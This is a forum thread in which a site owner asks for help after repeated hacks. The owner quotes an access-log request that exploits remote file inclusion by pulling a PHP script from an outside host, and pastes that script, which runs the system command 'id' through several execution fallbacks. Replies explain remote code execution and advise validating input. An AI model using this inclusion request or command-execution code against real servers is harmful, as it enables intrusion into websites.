Thread

hi
my site has been continously hacked since last week. when i see the access log found this.
http://www. myurl file .php?prefix=http://t0dz.tripod.com/id.txt?
CODE on that id.txt file was

<!—
echo “Mic22”;
$cmd=“id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,“r”))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

and the source code of the replaced index file is here:
http://www.0point5.com/hacked-1.htm

does any one know about these things and prevention.

This code tries to execute system command ‘id’ (Unix/Linux) which prints user identity (to which groups current user belongs etc.). So IF this has been executed, attacker will know more information about user rights (your hosting rights) and eventually can use this information for further attacks (likely again with the same script but with different, worse, command)

Looks like you’re not checking where the files are coming from within your GET variable. Anyway, this looks like a shell script to me and the practice is called “remote code execution” and this is where the hacker will try and import and execute his code on your server.

You need to limit acess to your server files in the GET variable.